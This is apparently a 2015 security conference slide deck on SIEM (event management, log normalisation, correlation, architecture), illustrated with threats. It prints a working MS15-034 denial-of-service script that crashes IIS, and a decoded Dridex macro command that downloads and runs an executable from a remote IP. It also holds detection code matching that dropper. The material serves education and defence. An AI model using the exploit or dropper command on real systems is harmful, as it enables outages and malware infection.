2015 Security Conference Security, Information and Event Management (SIEM) Paul Dutot IEng MIET MBCS CITP QSTM OSCP

Logicalis Security Conference




Who Am I

• Head of Penetration Testing and SIEM within Security Department @ Logicalis Jersey.

• Tiger Scheme accredited Penetration Tester.

• Certified in McAfee ESM and Vulnerability Manager.

• My role is a mix of ethical hacking and using those skills to provide Managed SIEM to our clients.

• Founder member of the CIISF and secretary of the Jersey BCS branch.

• Incorporated Engineer (IEng) / Chartered IT Professional (CITP).


Our clients

• Managed SIEM Incident Response – World Wide Engineering Company in 68 countries.

• Managed SIEM – Fortune 100 American Financial Business – 23,000 IPs in 26 countries.

• Managed SIEM for SMBs – ranging from customers with 2 firewalls to 30 devices under management.

And everything in between…

All managed by staff at Logicalis in Jersey.


What we shall talk about…

• SIEM Concepts

• What is SIEM. What does it solve?

• Meet the Dridex Malware

• Questions

• SIEM Architectures

• SIEM Features At A Glance

• Business Risks – Where are the threats?


Business Risks – Risks by Category

[Chart: incidents by category, 2014 vs 2015]

Source: Verizon Data Breach report


Business Risks – Incident Categorization by Industry Sector

Source: Verizon Data Breach report


MS 15-034 - How Fast the Bad Guys Move…

From Microsoft's patch for MS15-034 to a reverse-engineered exploit for sale on the Darknet: < 6 days.

<script>
/*
Name: IISer.htm
Description: Crashes a Windows IIS host vulnerable to MS15-034
Author: Malik Mesellem (@MME_IT)
*/
// Variables
var ip = "10.0.1.1";
var file = "welcome.png"; // For W2K8R2
// var file = "iis-85.png"; // For W2K12R2
var payload = "bytes=18-18446744073709551615"; // Tested on W2K8R2 and W2K12R2
var xmlhttp = new XMLHttpRequest();
// Sends the HTTP request 10 times
for (var i = 0; i < 10; i++) {
    xmlhttp.open("GET", "http://" + ip + "/" + file, true);
    xmlhttp.setRequestHeader("Range", payload);
    xmlhttp.send();
}
alert("Bye bye IIS!");
</script>

http://pastebin.com/SbN55M2H


Business Risks – Final Thoughts

“90% of all incidents is people. Whether it’s goofing up, getting infected, behaving badly or losing stuff, most incidents fall into the PEBKAC (Problem Exists Between Keyboard and Chair) and ID-10T (idiot) uber patterns.”

“Financial Motivation is also alive and well in phishing attacks. The old method of duping people into providing their personal identification number or bank information is still around but the targets are largely individuals versus organizations. Phishing with the intent of device compromise is certainly present.”

Source: Verizon Data Breach report

Since October 2014, Jersey and Guernsey companies across all sectors have been targeted by the ‘Dridex’ malware through email phishing.


What is SIEM? What issues does it solve?

SIEM is the evolution and integration of two distinct technologies:

• Security Event Management (SEM) ― primarily focused on collecting and aggregating security events.

• Security Information Management (SIM) ― primarily focused on the enrichment, normalization, and correlation of security events.

Security Information & Event Management (SIEM) is a set of technologies for: log data collection, correlation, aggregation, normalization, retention, analysis and workflow.

Three major factors driving the majority of SIEM implementations:

1. Real-time threat visibility

2. Security operational efficiency

3. Compliance and/or log management requirements


SIEM Concepts – Visibility Problem

FACT: A small network with 20 desktops will produce an average of 46 events per second (EPS) = 165,600 per hour = 3,974,400 per day. Bursts of events are 1.5 times this figure.

Do you fancy trying to investigate that many events for a security issue?


SIEM Concepts – Compliance Problem

PCI-DSS Compliance is one of the main drivers for a SIEM solution.

Meeting Section 10 – Logging Requirements is almost impossible without a SIEM!

There are at least 20 SIEM use cases that address aspects of PCI-DSS – see http://resources.infosecinstitute.com/siem-use-cases-pci-dss-3-0-part-1/


SIEM Concepts – Anatomy of an Event / Flow Life

Raw Logs / Flows

<164>Apr 15 2015 10:04:53: %ASA-4-106023: Deny tcp src InsideLAN:192.168.4.35/50381 dst Outside:216.41.215.186/80 by access-group "inside_in" [0x0, 0x0]

Life of the event:

• Raw logs stored and forensically tagged.

• Raw logs are normalised.

• Log processed by correlation engine.

• Raw logs stored in raw format.

• Security Alert !!

• Events come from devices such as workstations, routers, AD servers and security devices.

• Flows come from flow collectors or flow-enabled devices such as firewalls.

• Lots of different flow types supported, such as NetFlow / QFlow.

• Lots of different device types and logging options.

Normalisation = the process of getting different record formats from different devices into a common format.

SIEM solutions are sized primarily by capacity in terms of Events Per Second (EPS).
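As an added illustration of the normalisation step (example code written for this page, not the vendor's parser), the following turns the Cisco ASA deny line from the slide into a common-format event, keeping the raw record alongside the parsed fields; the sample line is the slide's, everything else is an assumption.

```python
import re
from datetime import datetime

# Constructed sample: the Cisco ASA 106023 deny line shown on the slide, as one syslog record.
RAW_ASA_LINE = (
    '<164>Apr 15 2015 10:04:53: %ASA-4-106023: Deny tcp src '
    'InsideLAN:192.168.4.35/50381 dst Outside:216.41.215.186/80 by '
    'access-group "inside_in" [0x0, 0x0]'
)

# Syslog <PRI> header (RFC 3164): PRI = facility * 8 + severity.
PRI_RE = re.compile(r'^<(?P<pri>\d{1,3})>(?P<rest>.*)$', re.S)
# ASA message 106023: an access-list denied a packet. "Zone:ip/port" is the ASA
# interface name, host and port; the ICMP variant carries no port, so it is optional.
ASA_106023_RE = re.compile(
    r'(?P<ts>\w{3} +\d{1,2} \d{4} \d{2}:\d{2}:\d{2}): %ASA-(?P<sev>\d)-(?P<msgid>\d{6}): '
    r'(?P<action>Deny) (?P<proto>\w+) src (?P<src_zone>[\w-]+):(?P<src_ip>[\d.]+)(?:/(?P<src_port>\d+))? '
    r'dst (?P<dst_zone>[\w-]+):(?P<dst_ip>[\d.]+)(?:/(?P<dst_port>\d+))? '
    r'by access-group "(?P<acl>[^"]+)"'
)

def normalise_asa_event(raw):
    """Turn one raw ASA syslog line into a common-format event dict.
    Returns None when the line is not a 106023 ACL deny (other message ids need their own parser)."""
    m = PRI_RE.match(raw)
    if not m:
        return None
    pri = int(m.group('pri'))
    body = ASA_106023_RE.search(m.group('rest'))
    if not body:
        return None
    f = body.groupdict()
    return {
        'raw': raw,                             # untouched record kept for forensics
        'facility': pri // 8, 'severity': pri % 8,
        'timestamp': datetime.strptime(f['ts'], '%b %d %Y %H:%M:%S').isoformat(),
        'vendor': 'cisco', 'product': 'asa', 'message_id': f['msgid'],
        'action': f['action'].lower(), 'protocol': f['proto'].lower(),
        'src_zone': f['src_zone'], 'src_ip': f['src_ip'],
        'src_port': int(f['src_port']) if f['src_port'] else None,
        'dst_zone': f['dst_zone'], 'dst_ip': f['dst_ip'],
        'dst_port': int(f['dst_port']) if f['dst_port'] else None,
        'rule': f['acl'],
    }
```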


SIEM Concepts – Correlation

• Correlation is the process of looking at events to determine their relevance and relationships to other events within the network, for example a successful login after a brute force attack.

• It can be applied in real-time and historical modes with a variety of rule types.

• 175+ correlation rules enabled by default.

• Correlation enables us to gain visibility into other non-traditional IT systems such as Access Control and BMS.

• Correlation rules combined with Watch Lists allow us to track security incidents in real time, such as a malware infection.
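As an added example of the "successful login after brute force" rule mentioned above (written for this page, not a rule from the product), this runs a real-time style sliding-window correlation over constructed, already-normalised authentication events; the field names, threshold and window are assumptions.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample of normalised authentication events, in time order.
SAMPLE_EVENTS = [
    {'ts': '2015-04-15T10:04:01', 'src_ip': '192.168.4.35', 'user': 'jsmith', 'outcome': 'failure'},
    {'ts': '2015-04-15T10:04:03', 'src_ip': '192.168.4.35', 'user': 'jsmith', 'outcome': 'failure'},
    {'ts': '2015-04-15T10:04:05', 'src_ip': '192.168.4.35', 'user': 'admin',  'outcome': 'failure'},
    {'ts': '2015-04-15T10:04:06', 'src_ip': '192.168.4.35', 'user': 'admin',  'outcome': 'failure'},
    {'ts': '2015-04-15T10:04:08', 'src_ip': '192.168.4.35', 'user': 'admin',  'outcome': 'failure'},
    {'ts': '2015-04-15T10:04:20', 'src_ip': '192.168.4.35', 'user': 'admin',  'outcome': 'success'},
    {'ts': '2015-04-15T10:05:00', 'src_ip': '10.0.0.7',     'user': 'bob',    'outcome': 'failure'},
    {'ts': '2015-04-15T10:05:30', 'src_ip': '10.0.0.7',     'user': 'bob',    'outcome': 'success'},
]

def correlate_bruteforce_success(events, threshold=5, window=timedelta(minutes=5)):
    """Keep a sliding window of failed logins per source IP (counted per source, not per
    user, so password spraying across accounts is caught too). A success from a source
    with >= threshold failures inside the window raises an alert. Returns the alerts."""
    failures = defaultdict(deque)   # src_ip -> timestamps of failures still inside the window
    alerts = []
    for ev in events:
        ts = datetime.fromisoformat(ev['ts'])
        q = failures[ev['src_ip']]
        while q and ts - q[0] > window:   # expire failures that fell out of the window
            q.popleft()
        if ev['outcome'] == 'failure':
            q.append(ts)
        elif ev['outcome'] == 'success' and len(q) >= threshold:
            alerts.append({'rule': 'successful login after brute force',
                           'src_ip': ev['src_ip'], 'user': ev['user'],
                           'failures_in_window': len(q), 'at': ev['ts']})
            q.clear()                     # one alert per burst, not one per later success
    return alerts
```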


SIEM Architecture – ESM / REC / ELM

[Diagram: log sources at the Main Office (Servers, Wireless Access Points, VPN Endpoints, IDS / IPS, Switches / Routers, Linux, Desktops) feed the Receiver, which forwards to the ESM and the ELM]

• Events / Flows arrive at the receiver.

• Raw logs are tagged and stored in the Enterprise Log Manager (ELM).

• Normalisation and Correlation takes place in the Enterprise Security Manager (ESM).

• Log collection can be in various formats (Syslog / SDEE for example).

• Desktop collection can be agent based, such as OSSEC HIDS, or agentless, e.g. WMI.

• Solution can be ‘Cloud’ or ‘On Premise’ or a ‘Hybrid’ with high availability.


SIEM Features – At A Glance

• Powerful Investigation of Events – find what is important in 3 clicks.

• Case Management of Incidents.

• Automate responses to Incidents.

• API to Interrogate / Update SIEM.

• Anomaly Behaviour Detection.

• Custom Dashboards and Powerful Reporting.

• Zone Management.

• Integration with Threat Intelligence Feeds – Public and Private.

• Data Enrichment allows us to further augment log content.


Why use a Logicalis Managed SIEM solution?

• Expertise – Logicalis Jersey is the World Wide security centre of excellence for Logicalis Group.

• Cost.

• Flexible consumption models.

• Strategic Partners.

• ISO27001 Certified.

• Redundant Data Centres in Jersey and Guernsey resolving jurisdictional data issues.

• Our multi-tenanted solution ensures data segregation at all levels.


Meet Dridex – Banking Malware

• It has code hidden in an Excel spreadsheet.

• VBA macro virus with hidden URL.

• When decoded it becomes…

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://92.63.88.63/kwefewef/fgdsee/dxzq.jpg','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;

Feb 2015: only 3 out of 57 AV engines detected it. Apr 2015: 39 out of 55.
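Since AV detection lagged by months, a SIEM rule over process-creation events is the defender's other angle on this dropper. As an added example (written for this page, not a product rule), the following flags a shell spawned under an Office application whose command line fetches a file into %TEMP% and runs it; the process events are constructed in a Sysmon-like shape, with the command line copied from the decoded macro on the slide.

```python
import re

# Constructed process-creation events (pid, parent pid, image, command line). The pid 300
# command line mirrors the decoded Dridex macro payload shown on the slide.
SAMPLE_PROCESSES = [
    {'pid': 100, 'ppid': 1,   'image': 'explorer.exe', 'cmdline': 'explorer.exe'},
    {'pid': 200, 'ppid': 100, 'image': 'EXCEL.EXE',    'cmdline': '"EXCEL.EXE" C:\\Users\\u\\invoice.xls'},
    {'pid': 300, 'ppid': 200, 'image': 'cmd.exe',
     'cmdline': 'cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('
                "'http://92.63.88.63/kwefewef/fgdsee/dxzq.jpg','%TEMP%\\JIOiodfhioIH.cab'); "
                'expand %TEMP%\\JIOiodfhioIH.cab %TEMP%\\JIOiodfhioIH.exe; start %TEMP%\\JIOiodfhioIH.exe;'},
    # Child PowerShell as the SIEM might see it after the cmd wrapper truncates the command line.
    {'pid': 400, 'ppid': 300, 'image': 'powershell.exe',
     'cmdline': 'PowerShell.exe (New-Object System.Net.WebClient).DownloadFile(...)'},
    # Benign: an administrator running PowerShell from Explorer, no Office ancestor.
    {'pid': 500, 'ppid': 100, 'image': 'powershell.exe', 'cmdline': 'powershell.exe Get-Process'},
]

OFFICE_APPS = {'excel.exe', 'winword.exe', 'powerpnt.exe', 'outlook.exe'}
SHELLS = {'cmd.exe', 'powershell.exe'}
# Download-then-run pattern from the decoded macro: fetch into %TEMP%, then expand or start it.
DOWNLOAD_RUN_RE = re.compile(r'DownloadFile\(.*%TEMP%.*\b(expand|start)\b', re.I | re.S)

def detect_office_dropper(processes):
    """Flag shell processes that descend from an Office application and whose command line
    downloads a file into %TEMP% and runs it. Returns one alert per matching process,
    with the ancestry chain so an analyst can see how the shell was launched."""
    by_pid = {p['pid']: p for p in processes}
    alerts = []
    for p in processes:
        if p['image'].lower() not in SHELLS or not DOWNLOAD_RUN_RE.search(p['cmdline']):
            continue
        # Walk up the parent chain looking for an Office application.
        chain, parent = [p['image']], by_pid.get(p['ppid'])
        while parent is not None:
            chain.append(parent['image'])
            if parent['image'].lower() in OFFICE_APPS:
                alerts.append({'rule': 'office app spawned download-and-execute shell',
                               'pid': p['pid'], 'chain': ' <- '.join(chain)})
                break
            parent = by_pid.get(parent['ppid'])
    return alerts
```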


ACME Trust – Anatomy of a Compromise

[Diagram: Dridex C2 Server Operator, Higher Level Hacker, File Server, AD Domain Server, Database Server]

• Malware installs a Key Logger and a Remote Access Trojan (RAT).

• Access sold to higher level hacker. Hacker uses already compromised credentials to upload Trojan versions / documents to the file server using credentials obtained via key logger.

• Database Server credentials are obtained and the Database Server is compromised. Data exfiltration begins…

• Eventually AD compromised = network compromised. You could find out like this……


Real Reputational Damage

http://dpaste.dzfl.pl/866433ffd07a


Demo Time

Bypassing Anti Virus using Windows Powershell in Excel


One for the Defenders

Hunting Malware with SysInternals Suite

Video

https://www.youtube.com/watch?v=Wuy_Pm3KaV8

PowerPoint

video.ch9.ms/sessions/teched/na/2014/DCIM-B368.pptx

“When combining the results from all four AV engines, less than 40% of the binaries were detected.”

Source: CAMP: Content-Agnostic Malware Protection, Proceedings of the 20th Annual Network & Distributed System Security Symposium


Thank You

Questions